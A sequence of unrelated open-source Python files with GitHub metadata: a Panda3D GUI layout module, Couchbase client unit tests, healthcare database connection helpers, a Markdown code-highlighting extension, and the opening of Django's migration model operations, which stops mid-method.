"id": "38628ea5a171ebaa31ca7ca9daa15f84eea9c583",
"size": "698",
"binary": false,
"copies": "3",
"ref": "refs/heads/develop",
"path": "setuper desktop app/gui/dialogs/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1806"
},
{
"name": "C++",
"bytes": "3059"
},
{
"name": "CSS",
"bytes": "171046"
},
{
"name": "JavaScript",
"bytes": "801718"
},
{
"name": "Lua",
"bytes": "72652"
},
{
"name": "Objective-C",
"bytes": "342"
},
{
"name": "Python",
"bytes": "8361927"
},
{
"name": "Shell",
"bytes": "58"
}
],
"symlink_target": ""
}
|
'''
====================================================================================
Copyright 2013, 2014 Windy Darian (大地无敌), Studio "Sekai no Kagami"
(世界之镜制作组) of Seven Ocean Game Arts (七海游戏文化社
, 北京航空航天大学学生七海游戏文化社) @ http://sogarts.com
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
====================================================================================
Created on April 4, 2013
Layout classes
@author: Windy Darian (大地无敌)
'''
from panda3d.core import NodePath
from direct.gui.DirectFrame import DirectFrame
from elements import GuiElement
def getSize(obj):
    '''
    Returns the size of an object.
    For a direct frame the result is the scaled frameSize (left, right, bottom, top),
    for Sogal GuiElement result is GuiElement.getFrameSize()
    and for normal NodePath and other object types it returns (0,0,0,0)
    '''
    if isinstance(obj, DirectFrame):
        size = obj['frameSize']
        sx = obj.getSx()
        sz = obj.getSz()
        # Scale the raw frame extents by the node's x/z scale factors.
        return (size[0]*sx, size[1]*sx, size[2]*sz, size[3]*sz)
    if isinstance(obj, GuiElement):
        return obj.getFrameSize()
    # NodePath and anything unrecognised have no measurable frame; the
    # original had two identical branches for these cases, merged here.
    return (0, 0, 0, 0)
class LayoutBase(NodePath):
    '''Common base for layouts: a NodePath owning an ordered list of items.'''
    def __init__(self, parent = None):
        NodePath.__init__(self,self.__class__.__name__)
        if not parent:
            # aspect2d is a Panda3D global injected into builtins at runtime.
            self.reparentTo(aspect2d) # @UndefinedVariable
        else: self.reparentTo(parent)
        self._itemlist = []
    def append(self, directobj):
        '''inherit this to append new object'''
        pass
    def resort(self):
        '''inherit this to resort when needed'''
        pass
    def __iter__(self):
        return iter(self._itemlist)
    def __getitem__(self, index):
        return self._itemlist[index]
    def __setitem__(self, index, val):
        self._itemlist[index] = val
        self.resort()
    def __delitem__(self, index):
        '''note that the object is not destroyed'''
        del self._itemlist[index]
        self.resort()
    def __getslice__(self, i, j):
        # NOTE(review): __getslice__/__setslice__ are Python-2-only hooks;
        # on Python 3, slicing is routed through __getitem__ with a slice.
        return self._itemlist[i:j]
    def __setslice__(self, i, j, value):
        self._itemlist[i:j] = value
        self.resort()
class HLayout(LayoutBase):
    '''horizontal layout'''
    def __init__(self,parent = None,margin = .05):
        LayoutBase.__init__(self, parent)
        # Horizontal gap between neighbouring items.
        self.__margin = margin
    def append(self, directobj):
        # Parent the item to the layout and place it right of the last item
        # (or at the origin when the layout is empty).
        directobj.reparentTo(self)
        if not self._itemlist:
            self._applyLayout(directobj, None)
        else:
            self._applyLayout(directobj, self._itemlist[-1])
        self._itemlist.append(directobj)
    def resort(self):
        # Re-place every item after its predecessor, in order.
        last = None
        for item in self:
            self._applyLayout(item, last)
            last = item
    def _applyLayout(self,directobj,previous):
        size = getSize(directobj)
        if previous:
            pSize = getSize(previous) #size of the previous object
            # New x = previous left anchor + previous right extent + margin,
            # shifted by this item's own left extent.
            directobj.setPos(previous.getPos()[0] +
                             pSize[1] +
                             self.__margin -
                             size[0]
                             ,0,0)
        else:
            directobj.setPos(-size[0],0,0)
    def getMargin(self):
        return self.__margin
    def setMargin(self, value):
        # Changing the margin re-lays-out all items.
        self.__margin = value
        self.resort()
class VLayout(LayoutBase):
    '''vertical layout'''
    def __init__(self,parent = None,margin = .05):
        LayoutBase.__init__(self, parent)
        # Vertical gap between neighbouring items.
        self.__margin = margin
    def append(self, directobj):
        # Parent the item to the layout and place it below the last item
        # (or at the origin when the layout is empty).
        directobj.reparentTo(self)
        if not self._itemlist:
            self._applyLayout(directobj, None)
        else:
            self._applyLayout(directobj, self._itemlist[-1])
        self._itemlist.append(directobj)
    def resort(self):
        # Re-place every item after its predecessor, in order.
        last = None
        for item in self:
            self._applyLayout(item, last)
            last = item
    def _applyLayout(self,directobj,previous):
        size = getSize(directobj)
        if previous:
            pSize = getSize(previous)
            # New z = previous anchor + previous bottom extent - margin,
            # shifted by this item's own top extent (z grows upward).
            directobj.setPos(0,0,previous.getPos()[2] +
                             pSize[2] -
                             self.__margin -
                             size[3])
        else:
            directobj.setPos(0,0,-size[3])
    def getMargin(self):
        return self.__margin
    def setMargin(self, value):
        # Changing the margin re-lays-out all items.
        self.__margin = value
        self.resort()
"""
#Deprecated
class HLayOut(LayoutBase):
'''horizontal layout for direct objects '''
def __init__(self,parent = None,margin = .5):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(previous.getPos()[0] + self.__margin,0,0)
else:
directobj.setPos(0,0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
class VLayout(LayoutBase):
'''vertical layout for direct objects'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(0,0,previous.getPos()[2] - self.__margin)
else:
directobj.setPos(0,0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
"""
"""
class DirectHLayout(LayoutBase):
'''horizontal layout for direct objects
Specially for DirectObjects for it can read its frame size
'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(previous.getPos()[0] +
previous['frameSize'][1] * previous.getSx() +
self.__margin -
directobj['frameSize'][0] * directobj.getSx()
,0,0)
else:
directobj.setPos(-directobj['frameSize'][0] * directobj.getSx(),0,0)
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
class DirectVLayout(LayoutBase):
'''vertical layout for direct objects
Specially for DirectObjects for it can read its frame size
'''
def __init__(self,parent = None,margin = .05):
LayoutBase.__init__(self, parent)
self.__margin = margin
def append(self, directobj):
directobj.reparentTo(self)
if not self._itemlist:
self._applyLayout(directobj, None)
else:
self._applyLayout(directobj, self._itemlist[-1])
self._itemlist.append(directobj)
def resort(self):
last = None
for item in self:
self._applyLayout(item, last)
last = item
def _applyLayout(self,directobj,previous):
if previous:
directobj.setPos(0,0,previous.getPos()[2] +
previous['frameSize'][2] * previous.getSz() -
self.__margin -
directobj['frameSize'][3] * directobj.getSz())
else:
directobj.setPos(0,0,-directobj['frameSize'][3] * directobj.getSz())
def getMargin(self):
return self.__margin
def setMargin(self, value):
self.__margin = value
self.resort()
"""
|
{
"content_hash": "e438fd12d5a577a6dcaed57c662c3bd1",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 84,
"avg_line_length": 30.79090909090909,
"alnum_prop": 0.515205196338943,
"repo_name": "WindyDarian/Sogal",
"id": "b815e0bfa9c749d86a2a510116fd26a5091d267c",
"size": "10266",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sogasys/gui/layout.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "228118"
},
{
"name": "Shell",
"bytes": "258"
}
],
"symlink_target": ""
}
|
import pycb
import unittest
import requests
import json
import time
def bucket_list():
    """Return the names of all buckets reported by the local Couchbase REST API."""
    response = requests.get("http://localhost:8091/pools/default/buckets")
    return [bucket['name'] for bucket in response.json()]
class TestPycb(unittest.TestCase):
@classmethod
def setUpClass(self):
self.cb = pycb.Couchbase("localhost", "Administrator", "password")
self.testBucket = self.cb.create("test")
@classmethod
def tearDownClass(self):
self.cb.delete("test")
def test_bad_connection_params(self):
cb = pycb.Couchbase("localhost", "Administrator", "passweird")
with self.assertRaises(pycb.PycbException):
self.testBucket = cb.bucket("test")
def test_create_and_delete_buckets(self):
bucketDefinitions = [
dict(
name="plain",
shouldFail=False,
params={}
),
dict(
name="bad",
shouldFail=True,
params=dict(
replicaNumber=100
)
),
dict(
name="memcached-bucket",
shouldFail=False,
params=dict(
bucketType="memcached"
)
)
]
for bucketDef in bucketDefinitions:
name = bucketDef['name']
params = bucketDef['params']
if bucketDef['shouldFail'] is True:
with self.assertRaises(pycb.PycbException):
self.cb.create(name, **params)
else:
self.cb.create(name, **params)
self.assertIn(name, bucket_list())
for bucketDef in bucketDefinitions:
if bucketDef['shouldFail'] is False:
self.cb.delete(bucketDef['name'])
self.assertNotIn(bucketDef['name'], bucket_list())
with self.assertRaises(pycb.PycbException):
self.cb.delete("nonexistentBucket")
def test_exception_string(self):
try:
raise pycb.PycbException(10, "it broke")
except pycb.PycbException as e:
self.assertEqual(e.error, 10)
self.assertEqual(e.errMsg, "it broke")
self.assertIn("it broke", e.__str__())
try:
raise pycb.PycbKeyNotFound(10, "it broke")
except pycb.PycbKeyNotFound as e:
self.assertEqual(e.error, 10)
self.assertEqual(e.errMsg, "it broke")
self.assertIn("it broke", e.__str__())
try:
raise pycb.PycbKeyExists(10, "it broke")
except pycb.PycbKeyExists as e:
self.assertEqual(e.error, 10)
self.assertEqual(e.errMsg, "it broke")
self.assertIn("it broke", e.__str__())
def test_get_view(self):
url = "http://Administrator:password@localhost:" \
"8092/test/_design/dev_test"
mapFunction = dict(map='function(doc, meta){if (meta.type == "json")'
'{emit(doc.key, doc.data);}}')
view = dict(test=mapFunction)
payload = dict(views=view)
headers = {'content-type': 'application/json'}
requests.put(
url,
data=json.dumps(payload, indent=4),
headers=headers
)
self.testBucket.set("testViewKey1", 0, 0,
'{"key": "key1", "data": "somedata"}')
self.testBucket.set("testViewKey2", 0, 0,
'{"key": "key2", "data": "somedata"}')
self.testBucket.set("testViewKey3", 0, 0,
'{"key": "key3", "data": "somedata"}')
params = dict(
stale="false",
startkey="key1",
endkey="key3"
)
time.sleep(1)
rows = self.testBucket.view("_design/dev_test/_view/test", **params)
self.assertTrue(len(rows) >= 3)
with self.assertRaises(pycb.PycbException):
self.testBucket.view("not_a_design_document")
def test_set(self):
self.testBucket.set("setTestKey", 0, 0, '{"data": "setdata"}')
data = self.testBucket.get("setTestKey")[2]
self.assertEqual(data, '{"data": "setdata"}')
def test_add(self):
self.testBucket.add("addTestKey", 0, 0, '{"data": "adddata"}')
data = self.testBucket.get("addTestKey")[2]
self.assertEqual(data, '{"data": "adddata"}')
with self.assertRaises(pycb.PycbKeyExists):
self.testBucket.add("addTestKey", 0, 0, '{"data": "adddata"}')
def test_replace(self):
with self.assertRaises(pycb.PycbKeyNotFound):
self.testBucket.replace("replaceTestKey", 0, 0,
'{"data": "replacedata"}')
self.testBucket.set("replaceTestKey", 0, 0,
'{"data": "notreplacedata"}')
self.testBucket.replace("replaceTestKey", 0, 0,
'{"data": "replacedata"}')
data = self.testBucket.get("replaceTestKey")[2]
self.assertEqual(data, '{"data": "replacedata"}')
def test_append(self):
self.testBucket.set("appendTestKey", 0, 0, "not JSON")
self.testBucket.append("appendTestKey", ", appended")
data = self.testBucket.get("appendTestKey")[2]
self.assertEqual(data, "not JSON, appended")
def test_prepend(self):
self.testBucket.set("prependTestKey", 0, 0, "not JSON")
self.testBucket.prepend("prependTestKey", "prepended, ")
data = self.testBucket.get("prependTestKey")[2]
self.assertEqual(data, "prepended, not JSON")
def test_get(self):
self.testBucket.set("getTestKey", 0, 0, '{"data": "getData"}')
data = self.testBucket.get("getTestKey")[2]
self.assertEqual(data, '{"data": "getData"}')
def test_delete(self):
self.testBucket.set("deleteTestKey", 0, 0, '{"data": "deleteData"}')
self.testBucket.delete("deleteTestKey")
with self.assertRaises(pycb.PycbKeyNotFound):
self.testBucket.get("deleteTestKey")[2]
with self.assertRaises(pycb.PycbKeyNotFound):
self.testBucket.delete("deleteTestKey")
def test_increment_and_decrement(self):
self.testBucket.incr("countKey")
self.assertEqual(self.testBucket.get("countKey")[2], 0)
self.testBucket.incr("countKey", amt=3)
self.assertEqual(self.testBucket.get("countKey")[2], 3)
self.testBucket.decr("countKey")
self.assertEqual(self.testBucket.get("countKey")[2], 2)
self.testBucket.set("countKey", 0, 0, "non-numeric")
with self.assertRaises(pycb.PycbException):
self.testBucket.incr("countKey")
def test_stats(self):
results = self.testBucket.stats()
self.assertIsInstance(results, list)
self.assertTrue(len(results) >= 1)
def test_flush(self):
results = self.testBucket.flush()
self.assertIsInstance(results, list)
self.assertTrue(len(results) >= 1)
def test_memcached_bucket(self):
params = dict(bucketType="memcached")
memcacheBucket = self.cb.create("memcacheBucket", **params)
self.assertIn("memcacheBucket", bucket_list())
memcacheBucket.add("addTestKey", 0, 0, '{"data": "adddata"}')
data = memcacheBucket.get("addTestKey")[2]
self.assertEqual(data, '{"data": "adddata"}')
self.cb.delete("memcacheBucket")
def test_connect_with_timeout(self):
bucket = self.cb.bucket("test", timeout=10)
bucket.set("getTestKey", 0, 0, '{"data": "getData"}')
data = bucket.get("getTestKey")[2]
self.assertEqual(data, '{"data": "getData"}')
cb = pycb.Couchbase("127.0.0.2", "Administrator", "password")
with self.assertRaises(pycb.PycbException):
bucket = cb.bucket("test", timeout=2)
# Allow running this test module directly (python test_pycb.py) as well as
# through a test runner.
if __name__ == '__main__':
    unittest.main()
|
{
"content_hash": "4a4836725c03000e57aff1d2dbfeebcd",
"timestamp": "",
"source": "github",
"line_count": 217,
"max_line_length": 77,
"avg_line_length": 36.89861751152074,
"alnum_prop": 0.5640064943174722,
"repo_name": "yamingd/pycb",
"id": "fe2bc1e309f4fc363abcd3a1794e7a33069b82da",
"size": "8007",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_pycb.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
import urllib
import sqlalchemy
import healthcareai.common.database_library_validators as hcai_db_library
try:
# Note we don't want to force pyodbc as a requirement
import pyodbc
pyodbc_is_loaded = True
except ImportError:
pyodbc_is_loaded = False
try:
# Note we don't want to force sqlite3 as a requirement
import sqlite3
sqlite3_is_loaded = True
except ImportError:
sqlite3_is_loaded = False
def build_mssql_trusted_connection_string(server, database):
    """Build a Trusted Connection MSSQL connection string.

    Args:
        server (str): Server name
        database (str): Database name

    Returns:
        str: an ODBC connection string using Windows integrated security
    """
    parts = [
        'DRIVER={SQL Server Native Client 11.0}',
        'Server=' + server,
        'Database=' + database,
        'Trusted_Connection=yes',
    ]
    return ';'.join(parts) + ';'
def build_mysql_connection_string(server, database, userid, password):
    """Build a MySQL connection string from credentials.

    Implements the previously stubbed-out function (it only did `pass` and
    returned None) using the format documented in its own TODO comment.

    Args:
        server (str): Server name
        database (str): Database name
        userid (str): User id
        password (str): Password

    Returns:
        str: a MySQL connection string
    """
    return 'Server={};Database={};Uid={};Pwd={};'.format(
        server, database, userid, password)
def build_sqlite_engine(file_path):
    """Build an sqlite engine for the given database file.

    Args:
        file_path (str): path to the sqlite database file

    Returns:
        sqlite3.Connection: an open sqlite3 connection
    """
    # Fail fast with a friendly message if sqlite3 could not be imported.
    hcai_db_library.validate_sqlite3_is_loaded()
    return sqlite3.connect(file_path)
def build_sqlite_in_memory_connection_string():
    """Return an in-memory sqlite connection string.

    Implements the previously stubbed-out function (it only did `pass` and
    returned None) using the value documented in its own TODO comment.

    Returns:
        str: an in-memory sqlite connection string
    """
    return 'Data Source=:memory:;Version=3;New=True;'
def build_mssql_engine_using_trusted_connections(server, database):
    """
    Given a server and database name, build a Trusted Connection MSSQL database engine. NOTE: Requires `pyodbc`

    Args:
        server (str): Server name
        database (str): Database name

    Returns:
        sqlalchemy.engine.base.Engine: an sqlalchemy connection engine
    """
    hcai_db_library.validate_pyodbc_is_loaded()
    connection_string = build_mssql_trusted_connection_string(server, database)
    # Bug fix: the file only does `import urllib`, which does not bind the
    # `urllib.parse` submodule; import it explicitly so quote_plus is
    # guaranteed to be available.
    import urllib.parse
    params = urllib.parse.quote_plus(connection_string)
    engine = sqlalchemy.create_engine("mssql+pyodbc:///?odbc_connect={}".format(params))
    return engine
|
{
"content_hash": "2f9b406b18cedcce83245e7fda6005c0",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 123,
"avg_line_length": 29.453125,
"alnum_prop": 0.7023872679045093,
"repo_name": "mxlei01/healthcareai-py",
"id": "433165b122e9a720d9a393aced1811a298241fc8",
"size": "1885",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "healthcareai/common/database_connections.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "4382"
},
{
"name": "Makefile",
"bytes": "609"
},
{
"name": "PowerShell",
"bytes": "7194"
},
{
"name": "Python",
"bytes": "250000"
},
{
"name": "Shell",
"bytes": "1552"
}
],
"symlink_target": ""
}
|
"""
Highlight.
A library for managing code highlighting.
All Changes Copyright 2014-2017 Isaac Muse.
---
CodeHilite Extension for Python-Markdown
========================================
Adds code/syntax highlighting to standard Python-Markdown code blocks.
See <https://pythonhosted.org/Markdown/extensions/code_hilite.html>
for documentation.
Original code Copyright 2006-2008 [Waylan Limberg](http://achinghead.com/).
All changes Copyright 2008-2014 The Python Markdown Project
License: [BSD](http://www.opensource.org/licenses/bsd-license.php)
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from markdown import Extension
from markdown.treeprocessors import Treeprocessor
from markdown import util as md_util
import copy
from collections import OrderedDict
try:
from pygments import highlight
from pygments.lexers import get_lexer_by_name, guess_lexer
from pygments.formatters import find_formatter_class
HtmlFormatter = find_formatter_class('html')
pygments = True
except ImportError: # pragma: no cover
pygments = False
try:
from markdown.extensions.codehilite import CodeHiliteExtension
except Exception: # pragma: no cover
CodeHiliteExtension = None
# Template for non-Pygments block output: (pre class attr, code class attr, code).
CODE_WRAP = '<pre%s><code%s>%s</code></pre>'
# Template for a class attribute fragment.
CLASS_ATTR = ' class="%s"'
# Extension defaults: each entry is [default value, help text].
DEFAULT_CONFIG = {
    'use_pygments': [
        True,
        'Use Pygments to highlight code blocks. '
        'Disable if using a JavaScript library. '
        'Default: True'
    ],
    'guess_lang': [
        False,
        # Fixed: help text previously claimed "Default: True" although the
        # actual default above is False.
        "Automatic language detection - Default: False"
    ],
    'css_class': [
        'highlight',
        "CSS class to apply to wrapper element."
    ],
    'pygments_style': [
        'default',
        'Pygments HTML Formatter Style '
        '(color scheme) - Default: default'
    ],
    'noclasses': [
        False,
        'Use inline styles instead of CSS classes - '
        'Default false'
    ],
    'linenums': [
        False,
        'Display line numbers in block code output (not inline) - Default: False'
    ],
    'extend_pygments_lang': [
        [],
        'Extend pygments language with special language entry - Default: {}'
    ]
}
# This subclass can only exist when Pygments imported successfully.
if pygments:
    class InlineHtmlFormatter(HtmlFormatter):
        """Format the code blocks."""
        def wrap(self, source, outfile):
            """Overload wrap.

            Route all output through `_wrap_code`; `outfile` is unused.
            """
            return self._wrap_code(source)
        def _wrap_code(self, source):
            """Return source, but do not wrap in inline <code> block."""
            # Emit empty boundary chunks and strip each token line so the
            # highlighted fragment stays on one inline line.
            yield 0, ''
            for i, t in source:
                yield i, t.strip()
            yield 0, ''
class Highlight(object):
    """Highlight class.

    Converts source code to highlighted HTML, either via Pygments or by
    emitting `language-*` classed markup for a JavaScript highlighter.
    """
    def __init__(
        self, guess_lang=True, pygments_style='default', use_pygments=True,
        noclasses=False, extend_pygments_lang=None, linenums=False
    ):
        """Initialize."""
        self.guess_lang = guess_lang
        self.pygments_style = pygments_style
        self.use_pygments = use_pygments
        self.noclasses = noclasses
        self.linenums = linenums
        self.linenums_style = 'table'
        # Normalize user supplied language extensions into a mapping of
        # alias -> [base lexer name, lexer options]; first definition wins.
        if extend_pygments_lang is None:
            extend_pygments_lang = []
        self.extend_pygments_lang = {}
        for language in extend_pygments_lang:
            if isinstance(language, (dict, OrderedDict)):
                name = language.get('name')
                if name is not None and name not in self.extend_pygments_lang:
                    self.extend_pygments_lang[name] = [
                        language.get('lang'),
                        language.get('options', {})
                    ]
    def get_extended_language(self, language):
        """Get extended language."""
        return self.extend_pygments_lang.get(language, (language, {}))
    def get_lexer(self, src, language):
        """Get the Pygments lexer."""
        if language:
            language, lexer_options = self.get_extended_language(language)
        else:
            lexer_options = {}
        # Try and get lexer by the name given.
        try:
            lexer = get_lexer_by_name(language, **lexer_options)
        except Exception:
            lexer = None
        if lexer is None:
            if self.guess_lang:
                lexer = guess_lexer(src)
            else:
                # Guessing disabled: fall back to the plain-text lexer.
                lexer = get_lexer_by_name('text')
        return lexer
    def escape(self, txt):
        """Basic html escaping."""
        # Bug fix: the previous body replaced each character with itself
        # (the entities were lost to HTML decoding), so no escaping happened
        # and raw markup leaked into the output. '&' must be escaped first
        # to avoid double-escaping the other entities.
        txt = txt.replace('&', '&amp;')
        txt = txt.replace('<', '&lt;')
        txt = txt.replace('>', '&gt;')
        txt = txt.replace('"', '&quot;')
        return txt
    def highlight(
        self, src, language, css_class='highlight', hl_lines=None,
        linestart=-1, linestep=-1, linespecial=-1, inline=False
    ):
        """Highlight code."""
        # Convert with Pygments.
        if pygments and self.use_pygments:
            # Setup language lexer.
            lexer = self.get_lexer(src, language)
            # Setup line specific settings. `not inline > 0` parses as
            # `not (inline > 0)`, i.e. line numbers are disabled inline.
            linenums = self.linenums_style if (self.linenums or linestart >= 0) and not inline > 0 else False
            if not linenums or linestep < 1:
                linestep = 1
            if not linenums or linestart < 1:
                linestart = 1
            if not linenums or linespecial < 0:
                linespecial = 0
            if hl_lines is None or inline:
                hl_lines = []
            # Setup formatter
            html_formatter = InlineHtmlFormatter if inline else HtmlFormatter
            formatter = html_formatter(
                cssclass=css_class,
                linenos=linenums,
                linenostart=linestart,
                linenostep=linestep,
                linenospecial=linespecial,
                style=self.pygments_style,
                noclasses=self.noclasses,
                hl_lines=hl_lines
            )
            # Convert
            code = highlight(src, lexer, formatter)
            if inline:
                class_str = css_class
        elif inline:
            # Format inline code for a JavaScript Syntax Highlighter by specifying language.
            code = self.escape(src)
            classes = [css_class] if css_class else []
            if language:
                classes.append('language-%s' % language)
            class_str = ''
            if len(classes):
                class_str = ' '.join(classes)
        else:
            # Format block code for a JavaScript Syntax Highlighter by specifying language.
            classes = []
            linenums = self.linenums_style if (self.linenums or linestart >= 0) and not inline > 0 else False
            if language:
                classes.append('language-%s' % language)
            if linenums:
                classes.append('linenums')
            class_str = ''
            if classes:
                class_str = CLASS_ATTR % ' '.join(classes)
            higlight_class = (CLASS_ATTR % css_class) if css_class else ''
            code = CODE_WRAP % (higlight_class, class_str, self.escape(src))
        if inline:
            # Return an etree element for inline use; class_str was computed
            # in whichever branch ran above.
            el = md_util.etree.Element('code', {'class': class_str} if class_str else {})
            el.text = code
            return el
        else:
            return code.strip()
def get_hl_settings(md):
    """Get the specified extension."""
    # Prefer this extension's own settings if it is registered.
    for ext in md.registeredExtensions:
        if isinstance(ext, HighlightExtension):
            return ext.getConfigs()
    # Otherwise fall back to CodeHilite's settings.
    for ext in md.registeredExtensions:
        if isinstance(ext, CodeHiliteExtension):
            return ext.getConfigs()
    # Neither extension registered: serve the documented defaults.
    defaults = copy.deepcopy(DEFAULT_CONFIG)
    return {key: value[0] for key, value in defaults.items()}
class HighlightTreeprocessor(Treeprocessor):
    """Highlight source code in code blocks."""
    def run(self, root):
        """Find code blocks and store in htmlStash."""
        blocks = root.iter('pre')
        for block in blocks:
            # Only handle the canonical <pre> wrapping a single <code> child
            # (the shape produced for indented code blocks).
            if len(block) == 1 and block[0].tag == 'code':
                # Build a highlighter from the extension's configured options.
                code = Highlight(
                    guess_lang=self.config['guess_lang'],
                    pygments_style=self.config['pygments_style'],
                    use_pygments=self.config['use_pygments'],
                    noclasses=self.config['noclasses'],
                    linenums=self.config['linenums'],
                    extend_pygments_lang=self.config['extend_pygments_lang']
                )
                # Highlight with no explicit language ('') and stash the raw
                # HTML so later serialization leaves it untouched.
                placeholder = self.markdown.htmlStash.store(
                    code.highlight(
                        block[0].text,
                        '',
                        self.config['css_class']
                    ),
                    safe=True
                )
                # Clear codeblock in etree instance
                block.clear()
                # Change to p element which will later
                # be removed when inserting raw html
                block.tag = 'p'
                block.text = placeholder
class HighlightExtension(Extension):
    """Configure highlight settins globally."""
    def __init__(self, *args, **kwargs):
        """Initialize."""
        # Deep-copy so user overrides never mutate the shared defaults.
        self.config = copy.deepcopy(DEFAULT_CONFIG)
        super(HighlightExtension, self).__init__(*args, **kwargs)
    def extendMarkdown(self, md, md_globals):
        """Add support for code highlighting."""
        ht = HighlightTreeprocessor(md)
        ht.config = self.getConfigs()
        # Run before inline processing so code content is stashed first.
        md.treeprocessors.add("indent-highlight", ht, "<inline")
        md.registerExtension(self)
def makeExtension(*args, **kwargs):
    """Return extension (Python-Markdown's entry point for this module)."""
    extension = HighlightExtension(*args, **kwargs)
    return extension
|
{
"content_hash": "fe19dc6c486d388ac2ff01f8d130d50a",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 109,
"avg_line_length": 31.729032258064517,
"alnum_prop": 0.5595770638470923,
"repo_name": "brunobergher/dotfiles",
"id": "280d3228c2334d8d8f232a0a298a28835ac78c60",
"size": "9836",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "sublime/pymdownx/st3/pymdownx/highlight.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7129"
},
{
"name": "JavaScript",
"bytes": "2189"
},
{
"name": "Python",
"bytes": "5640214"
},
{
"name": "Ruby",
"bytes": "13415"
},
{
"name": "Shell",
"bytes": "27223"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models
from django.db.migrations.operations.base import Operation
from django.db.migrations.state import ModelState
from django.db.models.options import normalize_together
from django.utils import six
from django.utils.functional import cached_property
from .fields import (
AddField, AlterField, FieldOperation, RemoveField, RenameField,
)
def _check_for_duplicates(arg_name, objs):
used_vals = set()
for val in objs:
if val in used_vals:
raise ValueError(
"Found duplicate value %s in CreateModel %s argument." % (val, arg_name)
)
used_vals.add(val)
class ModelOperation(Operation):
    """Base class for migration operations that act on a single model."""
    def __init__(self, name):
        self.name = name
    @cached_property
    def name_lower(self):
        # Cached: consulted repeatedly during migration optimization.
        return self.name.lower()
    def references_model(self, name, app_label=None):
        return name.lower() == self.name_lower
    def reduce(self, operation, in_between, app_label=None):
        # True here means "the later operation can be moved past this one"
        # (it neither combines with nor references this model).
        return (
            super(ModelOperation, self).reduce(operation, in_between, app_label=app_label) or
            not operation.references_model(self.name, app_label)
        )
class CreateModel(ModelOperation):
    """
    Create a model's table.
    """
    # Tells the migration writer to expand these kwargs over multiple lines.
    serialization_expand_args = ['fields', 'options', 'managers']
    def __init__(self, name, fields, options=None, bases=None, managers=None):
        self.fields = fields
        self.options = options or {}
        self.bases = bases or (models.Model,)
        self.managers = managers or []
        super(CreateModel, self).__init__(name)
        # Sanity-check that there are no duplicated field names, bases, or
        # manager names
        _check_for_duplicates('fields', (name for name, _ in self.fields))
        _check_for_duplicates('bases', (
            base._meta.label_lower if hasattr(base, '_meta') else
            base.lower() if isinstance(base, six.string_types) else base
            for base in self.bases
        ))
        _check_for_duplicates('managers', (name for name, _ in self.managers))
    def deconstruct(self):
        """Return (class name, args, kwargs) for serializing this operation."""
        kwargs = {
            'name': self.name,
            'fields': self.fields,
        }
        # Omit kwargs that still hold their default values.
        if self.options:
            kwargs['options'] = self.options
        if self.bases and self.bases != (models.Model,):
            kwargs['bases'] = self.bases
        if self.managers and self.managers != [('objects', models.Manager())]:
            kwargs['managers'] = self.managers
        return (
            self.__class__.__name__,
            [],
            kwargs
        )
    def state_forwards(self, app_label, state):
        # Register an in-memory ModelState; fresh containers guard against
        # later mutation of the operation's own attributes.
        state.add_model(ModelState(
            app_label,
            self.name,
            list(self.fields),
            dict(self.options),
            tuple(self.bases),
            list(self.managers),
        ))
    def database_forwards(self, app_label, schema_editor, from_state, to_state):
        model = to_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, model):
            schema_editor.create_model(model)
    def database_backwards(self, app_label, schema_editor, from_state, to_state):
        # Reverse of create is drop.
        model = from_state.apps.get_model(app_label, self.name)
        if self.allow_migrate_model(schema_editor.connection.alias, model):
            schema_editor.delete_model(model)
    def describe(self):
        return "Create %smodel %s" % ("proxy " if self.options.get("proxy", False) else "", self.name)
    def references_model(self, name, app_label=None):
        """Return True if this operation mentions the named model (itself,
        a base, or a relation target)."""
        name_lower = name.lower()
        if name_lower == self.name_lower:
            return True
        # Check we didn't inherit from the model
        models_to_check = [base for base in self.bases if base is not models.Model]
        # Check we have no FKs/M2Ms with it
        for fname, field in self.fields:
            if field.remote_field:
